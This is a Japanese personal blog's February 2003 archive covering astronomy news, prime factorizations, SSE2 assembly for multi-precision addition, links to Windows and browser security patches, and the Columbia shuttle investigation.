2003年2月アーカイブ

メモ

| コメント(0)

第 10 惑星

| コメント(0)

地球から見て常に太陽の裏側にある惑星ヤハウェ(Yahweh)。ボイジャー 1 号が撮影した Solar System Portrait (NASA - GSFC)の一連の写真の中で火星を撮影しようとした 39 番目のフレームの端に入っていたはずなのだけれど、方向が太陽に近すぎてカメラが壊れてしまったので火星もろとも写っているのかどうかわからなくなってしまったのだとか……うそです。ごめんなさい。

冗談はこっちにおいといて、まじめな話。観測技術の向上によって、冥王星を越えるサイズのカイパーベルト天体(KBO)がすぐにでも発見される可能性があります。特大サイズのカイパーベルト天体であるところの冥王星を惑星として認めるのであれば、新たに冥王星に匹敵するサイズのカイパーベルト天体が発見されたらそれも惑星として認めなければならないはずだという主張はもっともです。困ったことに、太陽系の中で具体的にどのような天体を「惑星」と呼ぶのか、物理的かつ簡潔な定義がありません(あるとすれば、冥王星は惑星ではないことになってしまうでしょう)。そこで、カリフォルニア大学バークレー校の Gibor Basri 氏 が「惑星」の新しい定義を提案したそうです。仮にその定義が採用された場合、小惑星ケレス(Ceres)とカイパーベルト天体のヴァルナ(20000 Varuna、2000 WR106)とクワイワー(50000 Quaoar、2002 LM60)が惑星に昇格し、太陽系の惑星の数は既に発見されているものだけでも 12 個になるそうです。国際天文学連合(IAU)が Basri 氏の案を採用して惑星の数を増やすか、それとも従来から言われている「冥王星は惑星ではない」という意見を採用して惑星の数を減らすか、あるいは混乱を避けるため「誰が何と言おうと太陽系の惑星の数は 9 個」で押し通すか、今後が気になります。

Controversial Proposal Would Boost Solar System's Planet Tally to 12 (SPACE.com、2 月 27 日)

関連

2002 年 10 月 8 日の日記

小惑星ケレスと大きなカイパーベルト天体の軌道シミュレーション(NASA - JPL)

Asteroid 1 Ceres … ケレス

Asteroid 20000 Varuna (2000 WR106) … ヴァルナ

Asteroid 28978 Ixion (2001 KX76) … イクシオン

Asteroid 55565 (2002 AW197) … (名称未定)

Asteroid 50000 Quaoar (2002 LM60) … クワイワー

Windows Me にセキュリティホール

| コメント(0)

MS03-006 に関する情報 (Microsoft、2 月 27 日)

日本語の説明が公開されたので追記

Windows Me の 「ヘルプとサポート」 の問題によりコードが実行される (812709) (MS03-006) (Microsoft、2 月 27 日)

Opera 7.02 for Windows(日本語版)

| コメント(0)

Opera 7.02 for Windows(日本語版)が公開されました。Opera 7 の日本語版が公開されたのは今回が初めてです。また、Opera 7.01 までにはクロスサイトスクリプティングの脆弱性が存在することが公表されています。

ダウンロード

Opera 7.02 for Windows, Japanese version (Opera Software ASA)

Opera 7.01 までの脆弱性の情報

Opera browser Cross Site Scripting (Secunia - Secunia Research)

頑張れボイジャー 1 号

| コメント(0)

パイオニア 10 号の打ち上げから 5 年半、1977 年 9 月 5 日に惑星・深宇宙探査機ボイジャー 1 号が打ち上げられました。ボイジャー 1 号はパイオニア 10 号よりも速度が速く、太陽からの距離では既にパイオニア 10 号を追い越しています(方向は異なります)。ボイジャー 1 号に搭載されている原子力電池は 2020 年頃まで電力を供給できるように設計されており、近いうちに末端衝撃波面(太陽風が恒星間ガスにぶつかって衝撃波が発生していると考えられているところ)を越えてヘリオシース(太陽風と恒星間ガスが混在する領域)に突入し、貴重なデータを送ってくることが期待されているそうです。その後ヘリオポーズ(ヘリオスフィア(太陽圏=太陽風が及ぶ範囲)の境界面)に達し、厳密な意味で太陽系を離脱する最初の探査機になるはずです。

Voyager (NASA - JPL)→ @nifty 翻訳

ボイジャー 1 号、いよいよ太陽系の最外層部へ (アストロアーツ、2000 年 12 月 21 日)

ボイジャー1号、人類最遠の地へ到達 (アストロアーツ、1998 年 2 月 16 日)

さようならパイオニア 10 号

| コメント(0)

地球外生命体へのメッセージを携えて 1972 年 3 月 2 日に打ち上げられた惑星・深宇宙探査機パイオニア 10 号との交信が困難になり、NASA はまもなくパイオニア 10 号との交信の試みを終了するそうです。1 月 23 日に届いた信号を最後に応答がなくなったとのことです。パイオニア 10 号は最後の信号を送ってきたとき地球から 122 億 1000 万 km、光の速さで片道 11 時間以上もかかる位置にあり、秒速 12.224km の速度で太陽系から離脱、深宇宙へ向かって果てのない旅を続けています………搭載されたメッセージを地球外生命体へ届けるという最後の役目を果たす日がいつか来ることを夢見て………。

Pioneer 10 falls silent after nearly 31 years (CNN.com、2 月 25 日)→@nifty 翻訳

Pioneer 10 Faint Beat Signals End Of Longest Mission Into Deep Space (SpaceDaily.com、2 月 25 日)→@nifty 翻訳

地球外生命体へのメッセージ 640x480 800x600 1024x768 1280x1024

過去の記事

宇宙探査機パイオニア 10 号から応答あり (アストロアーツ、2001 年 5 月 1 日)

巨大素数

| コメント(0)

知られている巨大素数のトップ 5 に更新がありました。645817 桁の 3*2^2145353+1 が第 5 位に入りました。

The Largest Known Primes (Chris K. Caldwell さん)

The "Top Ten" Record Primes … トップ 10

Output from database search … トップ 100

Oppose War With Iraq: Massive Fax Campaign

| コメント(0)

イラクへの武力行使反対をアメリカ議会に訴える署名活動。インターネットで署名できます。

Oppose War With Iraq: Massive Fax Campaign (The Petition Site)

ローズレッドのキューブ型 PC

| コメント(0)

ちかさん より、X1turbo シリーズ用の拡張 I/O ボックス CZ-81EB を活用したキューブ型 PC。色は鮮やかなローズレッド。これは世界に 1 台でしょう。

X1cute[mini-ITX] (パトラコ社 C研)

GMP-ECM 5.0

| コメント(0)

楕円曲線法による素因数分解プログラム GMP-ECM のバージョン 5.0 が公開されました。

ECMNET (Paul Zimmermann)

SSE2

| コメント(0)

例えば 128 ビットのキャリ付き整数加算ルーチンを x86 用の GCC で普通に書くとこんな感じです。

typedef struct {
  int dw[4];
} xmml;

int xmmladc(xmml *z, xmml *x, xmml *y, int c_in) {
  int c_out;
  asm volatile("negl    %0" : : "a" (c_in));  //下位からのキャリ
  asm volatile("movl    %0, %%eax" : : "m" (x->dw[0]) : "ax");
  asm volatile("adcl    %0, %%eax" : : "m" (y->dw[0]) : "ax");
  asm volatile("movl    %%eax, %0" : "=m" (z->dw[0]));
  asm volatile("movl    %0, %%eax" : : "m" (x->dw[1]) : "ax");
  asm volatile("adcl    %0, %%eax" : : "m" (y->dw[1]) : "ax");
  asm volatile("movl    %%eax, %0" : "=m" (z->dw[1]));
  asm volatile("movl    %0, %%eax" : : "m" (x->dw[2]) : "ax");
  asm volatile("adcl    %0, %%eax" : : "m" (y->dw[2]) : "ax");
  asm volatile("movl    %%eax, %0" : "=m" (z->dw[2]));
  asm volatile("movl    %0, %%eax" : : "m" (x->dw[3]) : "ax");
  asm volatile("adcl    %0, %%eax" : : "m" (y->dw[3]) : "ax");
  asm volatile("movl    %%eax, %0" : "=m" (z->dw[3]));
  asm volatile("setc    %%al" : : : "ax");
  asm volatile("movzbl  %%al, %0" : "=a" (c_out));  //上位へのキャリ
  return c_out;
}

同じ処理を 128 ビットの並列整数演算ができる SSE2(Pentium4 に実装されているストリーミング SIMD 拡張命令 2)を使って無理矢理書いたらこうなりました。

int xmmladc(xmml *z, xmml *x, xmml *y, int c_in) {
  int c_out;
  asm volatile("movdqa  %0, %%xmm0" : : "m" (*x));
  asm volatile("movdqa  %0, %%xmm1" : : "m" (*y));
  asm volatile("movdqa  %xmm0, %xmm2");
  asm volatile("pxor    %xmm1, %xmm2");  //xmm0^xmm1
  asm volatile("paddd   %xmm1, %xmm0");  //xmm0+xmm1
  asm volatile("movdqa  %xmm0, %xmm3");
  asm volatile("pandn   %xmm2, %xmm3");  //~(xmm0+xmm1)&(xmm0^xmm1)
  asm volatile("pandn   %xmm1, %xmm2");  //~(xmm0^xmm1)&xmm1
  asm volatile("por     %xmm3, %xmm2");  //~(xmm0^xmm1)&xmm1|~(xmm0+xmm1)&(xmm0^xmm1)
  asm volatile("psrad   $31, %xmm2");    //キャリ(0 or -1)
  asm volatile("movdqa  %xmm2, %xmm1");  //最上位のキャリを保存
  asm volatile("pslldq  $4, %xmm1");     //キャリを1つ上の位へ
  asm volatile("pxor    %xmm3, %xmm3");
  asm volatile("pinsrw  $0, %0, %%xmm3" : : "r" (c_in));  //下位からのキャリ
  asm volatile("psubd   %xmm3, %xmm1");  //下位からのキャリを合体
  asm volatile("psubd   %xmm1, %xmm0");  //キャリを加算
  asm volatile("pxor    %xmm3, %xmm3");
  asm volatile("pcmpeqd %xmm0, %xmm3");
  asm volatile("pand    %xmm3, %xmm1");  //キャリを加えた結果が0のところだけ-1 最大4個
  asm volatile("pmovmskb        %%xmm1, %%ecx" : : : "cx");  //xmm0!=0のところは0
  asm volatile("jecxz   skip");          //キャリがなくなったので終了
  asm volatile("movdqa  %xmm1, %xmm0");
  asm volatile("por     %xmm1, %xmm2");  //最上位のキャリを加算
  asm volatile("pslldq  $4, %xmm1");     //キャリを1つ上の位へ
  asm volatile("psubd   %xmm1, %xmm0");  //キャリを加算
  asm volatile("pxor    %xmm3, %xmm3");
  asm volatile("pcmpeqd %xmm0, %xmm3");
  asm volatile("pand    %xmm3, %xmm1");  //キャリを加えた結果が0のところだけ-1 最大3個
  asm volatile("por     %xmm1, %xmm2");  //最上位のキャリを加算
  asm volatile("pslldq  $4, %xmm1");     //キャリを1つ上の位へ
  asm volatile("psubd   %xmm1, %xmm0");  //キャリを加算
  asm volatile("pxor    %xmm3, %xmm3");
  asm volatile("pcmpeqd %xmm0, %xmm3");
  asm volatile("pand    %xmm3, %xmm1");  //キャリを加えた結果が0のところだけ-1 最大2個
  asm volatile("por     %xmm1, %xmm2");  //最上位のキャリを加算
  asm volatile("pslldq  $4, %xmm1");     //キャリを1つ上の位へ
  asm volatile("psubd   %xmm1, %xmm0");  //キャリを加算
  asm volatile("pxor    %xmm3, %xmm3");
  asm volatile("pcmpeqd %xmm0, %xmm3");
  asm volatile("pand    %xmm3, %xmm1");  //キャリを加えた結果が0のところだけ-1 最大1個
  asm volatile("por     %xmm1, %xmm2");  //最上位のキャリを加算
  asm volatile("skip:");
  asm volatile("psrldq  $12, %xmm2");    //最上位のキャリを最下位へ
  asm volatile("psrld   $31, %xmm2");    //キャリが確定
  asm volatile("movdqa  %%xmm0, %0" : "=m" (*z));
  asm volatile("pextrw  $0, %%xmm2, %0" : "=r" (c_out));  //上位へのキャリ
  return c_out;
}

あまり深く考えていないので無駄やバグがあると思いますが、最初に書いた x86 用のコードよりも速くすることはどうやっても不可能です。128 ビットすべてにデータを充填することを諦めればこれよりも少し速くできますが、それでも最初のコードには及びません。

SSE2 にはキャリ付き整数加算命令および符号なし整数比較命令が存在しないので、数倍から数十倍程度の多倍長整数演算に SSE2 はまったく役に立ちません。

SSE2

| コメント(0)

少し前のことになりますが、P4 3.06GHz 1GB なマシンを手に入れました。こいつに素因数分解をさせて遊んでいるのですが、それなりに速くて面白いです。まあ、素因数分解はマシンがいくら速くても速すぎるということがないので、以前と比べれば速いというだけですが。P4 は初めてなので SSE2 を少しいじってみたのですが、P3 の SSE にはない並列整数演算命令を持っているものの、やはり多倍長整数演算には不向きらしくてちょっとがっかりです。どこかにレジスタ上の 1024 ビットの整数同士の加減算を平均 3 クロックサイクル以下、ワーストケース 16 クロックサイクルくらいで処理できるプロセッサってないですかねぇ。加減算よりも乗除算と剰余算のほうが大変そうですが。あ、クロック周波数 100KHz とかいうのはナシですよ。

素因数分解

| コメント(0)

(16*10^108-61)/9 =

1777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777771<109> =

13665334897<11> * 3192327507363357385140298034185999327924867<43> *

40752077512002785469292357740154114966766925061086699529<56>

XM6 version 1.10

| コメント(0)

素因数分解

| コメント(0)

(82*10^104+71)/9 =

911111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111119<105> =

2877334510774662743911313907879097392207174547<46> *

316651090688031718750771928740237068788953977912411481493077<60>

スパムメール

| コメント(0)

悪質なスパムメールに返信したらどうなるか、という怖い実験のお話。

スパムメールに返事を出したら――体験レポート (HotWired Japan WIRED NEWS、2 月 21 日)

12 月 19 日の日記1 月 31 日の日記に書いたイメージスパムの場合はメールを開いただけで上の記事と同じことが起こりかねません。HTML メールは原則として開かないほうがよいと思います。

素因数分解

| コメント(0)

(2*10^81+1)/3 =

666666666666666666666666666666666666666666666666666666666666666666666666666666667<81> =

2399421520626029861918272171940676301643<40> * 277844747550954514120814179402028087323169<42>

Factorizations of 66...667 (66...667 の素因数分解)(STUDIO KAMADA)

以前に公開された修正プログラム Q810847(MS03-004)を適用することによって生じる問題を修正するための修正プログラム。MS03-xxx の番号が付けられていないため詳細情報の所在がわかりにくい。

マイクロソフト セキュリティ情報一覧 (Microsoft)

Internet Explorer 用の累積的な修正プログラム (810847) (MS03-004) (Microsoft)

マイクロソフト サポート技術情報 - 814895 MS03-004 の修正モジュールの適用後に発生する現象について (Microsoft)

マイクロソフト サポート技術情報 - 813951 [IE] Internet Explorer を使用するプログラムで Web サイトの認証ができない (Microsoft)

February 2003, Update for Internet Explorer 6 SP1 (813951) (Microsoft) …Japanese を選択する

内小惑星 2003 CP20

| コメント(0)

近日点が地球の軌道の内側にある天体(地球の軌道の内側に入り込む天体)はたくさん見つかっていますが、遠日点が地球の軌道の内側にある天体(地球の軌道よりも内側で太陽のまわりを回っている天体)は水星と金星以外では今月 11 日に発見された小惑星 2003 CP20 が初めてなのだそうです。初めてというのはちょっと意外。絶対光度から換算すると大きさは 1km~4km の間くらいかな。

初の「内小惑星」 (アストロアーツ、2 月 20 日)

Asteroid (2003 CP20) (NASA - JPL - NEO) … 軌道シミュレーション(Java アプレット)

スクロールバーを動かして視点の位置を変えると軌道の大きさがわかりやすいです。

リンク集(翻訳・辞書)

| コメント(0)

リンク集(翻訳・辞書)の自動選択フォームにサンスクリット語の辞書検索を追加しました。例えば、英語→サンスクリット語を選択して「sesamum indicum」(ゴマ(sesame)の学名)を辞書検索すると、ゴマはサンスクリット語(Harvard-Kyoto 式表記)で「tila」であることがわかります。(関連:2001 年 10 月 23 日の日記

わりとどうでもいい話

| コメント(0)

たまたま見掛けた「みんなのうた」で『ばぶるばす』が流れていたので、思わず最後まで聴いてしまいました。

Netscape 7.02

| コメント(0)

Netscape 7.0 Download (Netscape)

韓国の地下鉄火災

| コメント(0)

死者 125 人以上(公式 53 人+非公式 72 人)、負傷者 146 人、行方不明者 305 人(ロイター)。

S.Koreans Mourn as Search for Subway Dead Goes On (Reuters、2 月 19 日)→@nifty 翻訳

韓国の地下鉄火災

| コメント(0)

韓国の地下鉄火災

| コメント(0)

午後 7 時現在、死者 51 人、負傷者 136 人、行方不明者 59 人。

사망 51명, 부상 138명, 실종 59명-7시 현재 (Yahoo! KOREA ニュース速報、2 月 18 日)→OCN 翻訳

アメリカは豪雪

| コメント(0)

首都ワシントンの積雪は史上 6 番目の 41 センチ、ニューヨークの JFK 国際空港では 60 センチ以上。

Winter storm paralyzes much of East Coast (CNN.com、2 月 17 日)→@nifty 翻訳

韓国の地下鉄火災

| コメント(0)

きょう午前 9 時 55 分頃、韓国大邱市の中央路駅付近を走行中の地下鉄で放火とみられる火災が発生し、少なくとも 3 人が死亡、110 人以上が負傷したとのこと。

韓国: 大邱市で地下鉄火災、乗客ら多数死傷 放火の疑い (Mainichi INTERACTIVE、2 月 18 日)

대구지하철 방화 2명 사망,100여명 부상(5보) (Yahoo! KOREA ニュース速報、2 月 18 日)→OCN 翻訳

韓国の地下鉄火災

| コメント(0)

きょう午前 9 時 55 分頃、韓国大邱市で地下鉄が放火され、100 人以上が負傷との記事。

韓国: 大邱市の地下鉄で火災 乗客ら100人以上負傷 (Mainichi INTERACTIVE、2 月 18 日)

대구지하철 방화 100여명 부상(4보) (Yahoo! KOREA ニュース速報、2 月 18 日)→OCN 翻訳

太陽とコメットさん☆

| コメント(0)

キラッとお楽しみ。

The very latest SOHO images (NASA) … 右下の LASCO C3 の画像にニート彗星 C/2002 V1 が写っています

LASCO/EIT REAL TIME MOVIES … ムービーあり

参考

ニート彗星(C/2002 V1)が SOHO/LASCO C3 の視野を通過する (アストロアーツ、2 月 14 日)

追記

アストロアーツのきょうの記事。

SOHO/LASCO C3 の視野内に表れたニート彗星(C/2002 V1)を見逃すな (アストロアーツ、2 月 18 日)

巨大素数

| コメント(0)

知られている巨大素数のトップ 5 に更新がありました。628808 桁の 62722^131072+1 が第 5 位に入りました。

The Largest Known Primes (Chris K. Caldwell さん)

The "Top Ten" Record Primes … トップ 10

Output from database search … トップ 100

ミラーサイトの URL

| コメント(0)

きのう書いたミラーサイトの URL は Tripod の短縮 URL なのですが、短縮 URL にすると厳密な RFC では英数字またはハイフンで構成されなければならないホスト名を書く場所に「_」(アンダースコア)を含む名前が入ってしまうため、長いほうの URL を併記しておくことにします。

STUDIO KAMADA の新しいミラーサイトの URL は http://members.tripod.co.jp/m_kamada/ または http://m_kamada.tripod.co.jp/ です。STUDIO KAMADA へのハイパーリンクにミラーサイトの URL を添えていただく場合には長いほうの URL でお願いいたします。

黒田基さん よりご指摘をいただきました。ありがとうございます。

クロネコさんの罠

| コメント(0)

クロネコさんは集荷予定時刻を集荷先に電話連絡するとき依頼者の名前を正確に把握していないことがあるみたい。電話に出た家族が依頼者の名前を確認したところ、クロネコさんはどういうわけか他の家族の名前を答えたので、家族が“本人”に確認した上で「頼んでいません」と断ってしまったそうな。私が頼んだのにぃ。

広東語(Cantonese)字典

| コメント(0)

@nifty のサーバが落ちることはほとんどないのですが、昨夜落ちたときにトクトクのミラーが役に立たなかったので、Tripod(Lycos)に新しいミラーを作りました。

STUDIO KAMADA の新しいミラーサイトの URL は http://members.tripod.co.jp/m_kamada/ または http://m_kamada.tripod.co.jp/ です。

なお、Tripod には 12MB の容量制限があるため、一部のコンテンツがアップロードされていません。ご了承ください。

サーバ不調

| コメント(0)

最近ミラーサイトが不調続きなのでミラーを引っ越すかどうか考えていたところだったのですが、きょうは @nifty のサーバも落ちてしまい、STUDIO KAMADA がまったく閲覧できない状態になってしまいました。とりあえず新しいミラーを作ることを考えます。

てれび

| コメント(0)

フジテレビの ウチくる!? のゲストが相田翔子さんだったのでチェキ。地元なので。

最後のアリアン 4 型ロケットが日本時間のきょう午後 4 時に無事打ち上げられ、アリアンスペース社のアリアン 4 型ロケットは 1988 年から続いた役目を終えました。アリアン 4 型ロケットは 116 回の打ち上げで成功率98%97.4%という高い信頼性を誇っていました。後継のアリアン 5 型ロケットは 14 回の打ち上げで既に 4 回失敗しており、先月アリアン 5 型ロケットで打ち上げられる予定だった ESA の彗星探査機 Rosetta の打ち上げが延期される事態になっています。

Goodbye Ariane 4: Finale flight for workhorse rocket (Spaceflight Now、2 月 14 日)→ @nifty 翻訳

Final Ariane 4 Rocket Sends Intelsat 907 to Orbit (SPACE.com、2 月 14 日)→@nifty 翻訳

News/Mission log (arianespace、2 月 15 日)→@nifty 翻訳

不思議な光のすじ

| コメント(0)

きょうの夕方は雲が多く、太陽は早々と見えなくなっていました。夕闇がせまってきた頃、西の空の雲の隙間にオレンジ色の光のすじがあることに気づきました。まるでペン先の広い蛍光マーカーで空の途中まで線を引いたような感じの不思議な光のすじです。正体が何なのかはっきりとはわかりませんが、時間が経って崩れて幅が広くなった飛行機雲が夕日に染まって輝いていたのかも知れません。それにしても、周囲の灰色の雲よりも遠くにあるのに妙に太くて、崩れた飛行機雲にしては妙にまっすぐで、しかも先端をハサミで切ったかのようにバッサリ切れているところが奇妙です。何か巨大な物体が雲を引いて飛んでいるのではないかと思いたくなるような光景でした。何だかよくわからないまま写真を数枚撮っているうちに霞んで消えてしまいました。

撮影日:きょう。ロケ地:北山公園(東京都東村山市)。

光の先端を拡大
光の先端を拡大

X68000 用ディスプレイの件

| コメント(0)

昨日のうちにお二方からメールをいただきましたので締め切りました。

X68000 用ディスプレイあげます

| コメント(0)

手元にある X68000 用のディスプレイ CZ-614D-TN(チタンブラック)を処分しようと思っているのですが、もしも「捨てるくらいなら私がもらう」という方がいましたら差し上げます。ただし、スピーカなし、チルトスタンドなし、フロントパネルの蓋なし、リモコンあり、汚れあり、保証なし、送料こちら持ち、返品不可です。以前まで 31KHz モードで使っていたので 31KHz モードは映ると思いますが、24KHz モードと 15KHz モードとテレビが正常に映るかどうかは確認してみないとわかりません。こんなものでもタダなら欲しいという奇特な方は、お名前と連絡先のメールアドレスと動作確認が必要な項目を明記して メール でなるべく早くご連絡ください。有効な要望がなければこのまま処分します。

追記:締め切りました。

シャトル事故関連

| コメント(0)

空中分解直前のコロンビアの写真を撮影した米空軍 Starfire Optical Range(SOR)の施設について9 日の日記に「口径 3.5 メートルの反射望遠鏡をはじめとする複数の望遠鏡を持っている」と書きましたが、そのような施設の中で実際にコロンビアの撮影に使われたのは口径わずか 9 センチの光学望遠鏡と 11 年も前から使っている古いマッキントッシュだったそうです。そもそもこの撮影は誰かに依頼されたものではなく、高速で移動する物体を撮影してみたいと思っていた技術者(写真マニア)にとってコロンビアは格好の題材だったので自由時間に個人的に撮影してみただけとのこと。確かに米空軍を支援する最先端の施設の画像にしては不鮮明すぎるような気もしていましたが、シャトルは高空を高速で移動しているのだからこの程度なのかも知れないと思い、まさか 9 センチの望遠鏡だとは思いませんでした。AP が伝えた記事には「これは我々(SOR)がこれまでに撮影した中で最も不鮮明な写真であり、それと同時に新聞の 1 面を飾る 1 枚でもある」とのコメントが掲載されています。

Columbia Photo Taken with Simple Telescope and Computer (SPACE.com、2 月 12 日)→@nifty 翻訳 …AP

'Hi-tech' shuttle pic really low-tech (CNN.com、2 月 12 日)→@nifty 翻訳 …AP(上の記事と同じ)

シャトル事故: 機体画像は小型望遠鏡で撮影 証拠価値に疑問 (Mainichi INTERACTIVE、2 月 13 日)

コモンドール

| コメント(0)

モップに顔が…。

Komondor (PETsMART.com)→@nifty 翻訳

上記のページの説明によると、コモンドールの体高は 25.5~30 インチ(65~76cm)、体重は 70~120 ポンド(32~54kg)、寿命は 10~12 年。毎月欠かさずシャンプー・リンスをしてあげること。ただし、乾くのに数日かかるそうです。子供と遊ぶのが好き。

「コモドール PET」(Commodore PET)とは関係ありません。

ドッグショー

| コメント(0)

10 日にニューヨークで開かれたドッグショーの記事をいくつか拾ってきました。写真のコメントつき。

出番を待っているフレンチブルドッグ

Dogs Sniff Out Success at Westminster Dog Show (The Olympian、2 月 11 日)→@nifty 翻訳

モップみたいなコモンドール(超大型犬)

DOG SHOW BREEDS CONTEMPT (NEW YORK POST、2 月 11 日)→ @nifty 翻訳

でかくて顔がこわいけどプードル?

纽约 全美名犬大 赛 (新華社、2 月 11 日)→SYSTRAN+SYSTRAN 翻訳

岡山県の吉備高原都市に引っ越した著者が地域にブロードバンド環境を普及させるために奮闘するという実話。日本画家の森山知己さんが ZDNet で連載中です。

田舎暮らしとブロードバンド~地域イントラネット奮闘記 (ZDNet)

森山さんのページ

森山知己の ART ホームページ

X68000 ユーザ(だった人)は森山さんの 恐竜ジュリアナ骸骨 (アニメ GIF、193KB)を見たことがあるかも。

Dumbbell Nebula

| コメント(0)

ハッブル宇宙望遠鏡がとらえた亜鈴星雲。

Close-up of M27, the Dumbbell Nebula (HubbleSite、2 月 10 日)→@nifty 翻訳

軌道エレベータ構想、再び

| コメント(0)

地表から静止軌道まで続く軌道エレベータについて2000 年 12 月 26 日の日記にいろいろ書きました。スペースシャトル・コロンビアの事故がきっかけとなるのは残念ですが、軌道エレベータの構想が本格的になる可能性には期待したいと思います。WIRED NEWS に掲載された NASA の先端構想研究所のロバート・カサノバ所長の言葉によると、静止軌道よりも遥か先の高度 10 万キロの宇宙空間まで続く宇宙エレベータが「技術的には実行可能だ。物理学的に何ら問題はない」とのこと。心強いお言葉です。しかし、いくらカーボンナノチューブを用いた建材が強くて軽いとはいっても、高度 3 万 6000km の静止軌道から地表までぶら下がっているエレベータの重量を支えるのは容易なことではないはずです。高度が高い部分は遠心力が働くので少し軽くなりますが、大部分は大気圏外ですから浮力は期待できません。また、構造上、静止軌道側から建設する必要があるので、建材を調達できたとしてもそれを建設現場まで運ぶのが大変です。そして万が一、エレベータが最も張力を受ける静止軌道付近で切断された場合、地球を半周以上できる長さの物体が大気圏に突っ込んでくることになります……などなど、いろいろ問題があるのですが、考えれば考えるほど「軌道エレベータをこの目で見たい」という願望は募るばかりです。

宇宙空間へ物資や人を運ぶ「宇宙エレベーター」、実現は 15 年後? (WIRED NEWS、2 月 10 日)

リファラ

| コメント(0)

きのうのリファラにブラウザクラッシャーのつもりらしいページのアドレスが 3 件記録されていました。3 件とも国内の異なる ISP からのアクセスだったのですが、流行っているのでしょうか。

localtimeREMOTE_ADDRHTTP_USER_AGENTHTTP_ACCEPT_LANGUAGE
2003-02-09 17:24:43211.131.53.208
KKRfi-01p2-208.ppp11.odn.ad.jp
Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)ja
2003-02-09 17:29:56210.128.76.72
f8-pc72.cty-net.ne.jp
Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)ja
2003-02-09 17:36:44218.47.246.122
i246122.ap.plala.or.jp
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)ja

こんなの作った

| コメント(0)

IE 用翻訳メニュー(STUDIO KAMADA)

「IE 用翻訳メニュー」はリンク集(翻訳・辞書)の自動選択フォームを IE の右クリックメニューから呼び出して使ってしまおうという IE 専用のツールです。右クリックメニューの中の「翻訳」1 個だけで、英和、和英、韓日、中日(簡体字、繁体字)、露日、土日のページ翻訳とテキスト翻訳および翻訳リンク生成が全部できます。選択したテキストが自動的にフォームの中に転送されるので、テキスト翻訳がうまくいかなったときは単語をダブルクリックで選択して「選択範囲└→」ボタンを使って辞書検索に回すことができます。

以前に作ったMicrosoft Internet Explorer 用「OCN 翻訳」のほうが機能も動作もシンプルです。

ロシア語とトルコ語を追加しました。でもトルコ語の機械翻訳はあてにならないので自分で翻訳したほうがいいかも。

シャトル事故関連

| コメント(0)

米空軍 Starfire Optical Range(SOR)がとらえた空中分解直前(日本時間の 2 月 1 日午後 10 時 57 分頃)のコロンビアの写真。左翼前縁のぎざぎざが何なのかはまだわかっていないようです。

NASA not convinced photos reveal Columbia's problem (CNN.com、2 月 7 日)→@nifty 翻訳

Dramatic week ends with Air Force photo release (Spaceflight Now、2 月 7 日)→@nifty 翻訳

Columbia Investigation Enters New Phase, Air Force Picture Adds Intrigue (SPACE.com、2 月 7 日)→@nifty 翻訳

Image Display … 大きい写真(解像度は変わらず)

03-046: NASA Announces Research Grants in Fundamental Physics (NASA、2 月 7 日)

No.686 :NASA、米空軍が撮影した空中分解直前のコロンビア画像を公表 (松浦晋也氏、宇宙作家クラブ ニュース掲示板、2 月 8 日)

SOR は海抜 6240 フィート(≒1902 メートル)のニューメキシコ州カートランド空軍基地内にあり、天体観測ではなく空軍の支援のために口径 3.5 メートルの反射望遠鏡をはじめとする複数の望遠鏡を持っているようです。口径 3.5 メートルの望遠鏡は高さ 35 フィート(≒11 メートル)、重さ 275000 ポンド(≒125 トン)、主鏡の重さは 4500 ポンド(≒2 トン)、鏡面は 21 ナノメートルの精度で磨かれ、コンピュータ制御の 56 個のアクチュエータで支えられているそうです。

参考までに、ハワイのマウナケア山頂にある「すばる望遠鏡」は口径 8.2 メートルで、平均誤差 12 ナノメートルの精度で磨かれた厚さ 20 センチ重さ 22.8 トンの 1 枚鏡が 261 個アクチュエータで支えられています。

The Air Force Research Laboratory splash page (Air Force - AFRL)

Directed Energy Directorate … アクセス困難

Welcome to the Starfire Optical Range! … アクセス困難

Image Display(SPACE.com) … カートランド空軍基地にある Starfire Optical Range(SOR) 施設の写真

Subaru Telescope, NAOJ (すばる望遠鏡)

うめうめうめうめうめぇー

| コメント(0)

…ごめんなさい。海に行った帰りに青葉の森公園の梅園を見てきました。

撮影日:きょう。ロケ地:青葉の森公園(千葉市)。

うみうみうみうみうみぃー

| コメント(0)

久しく海を見ていなかったので、つい。きょうは早起きして九十九里浜まで海を見に行きました。

撮影日:きょう。ロケ地:九十九里浜。

シャトル事故関連

| コメント(0)

読むべし

No.684 : 有翼・再使用型宇宙船の蹉跌 (野尻抱介氏、宇宙作家クラブ ニュース掲示板、2 月 7 日)

-Rebirth-

| コメント(0)

シャトル事故関連

| コメント(0)

外部燃料タンクとコロンビアの高解像写真やスペースシャトルまめ知識など

My home Gallery (松永慎二さん)

火星大接近

| コメント(0)

今年の夏は火星を見よう。

見えはじめた火星(NAO ニュース) (アストロアーツ、2 月 6 日)

IE のパッチ

| コメント(0)

俺ニュース さんより。

「3 ヶ月も前に気づいてた問題を今更「緊急」とか言われてもなぁ」

いやはや、まったくその通りであります。

シャトル事故関連

| コメント(0)

NASA から「たとえ外部燃料タンクの断熱材の破片が衝突したとしても、それだけで翼の耐熱タイルに重大な傷が付くようなことはない」との見解が発表されました。4 日の日記に「そんなに簡単に解明できていいのか?」という疑問を書きましたが、やはり断熱材が衝突する様子が映像に残っていたからといってそれが単独の主因だと考えるのは短絡的すぎたのかも知れません。

「断熱材、主因とは考えにくい」 シャトル事故でNASA (CNN.co.jp、2 月 6 日)

燃料タンク断熱材は「シロ」 原因調査、振り出しに (asahi.com、2 月 6 日)

断熱材直撃「根本原因でない」NASAが見解 (Mainichi INTERACTIVE、2 月 6 日)

Tank foam may not be single 'root cause' of shuttle failure (Spaceflight Now、2 月 5 日)→@nifty 翻訳

「Internet Explorer 用の累積的な修正プログラム (810847)」が公開されました。

MS03-004 に関する情報 「MS03-004: Internet Explorer 用の累積的な修正プログラム (810847)」 (Microsoft、2 月 6 日)

以下の実験が動作しなくなりました。

Windows+IE におけるプログラム強制実行の実験と対策(その5) (STUDIO KAMADA)

Windows+IE におけるプログラム強制実行の実験と対策(その6) (STUDIO KAMADA)

関連

マイクロソフト サポート技術情報 - 811630 HTML Help Update to Limit Functionality When It Is Invoked with the Window.showHelp( ) Method (Microsoft、2 月 6 日)

IE に「緊急」の脆弱性、累積パッチリリース (ZDNN、2 月 6 日)

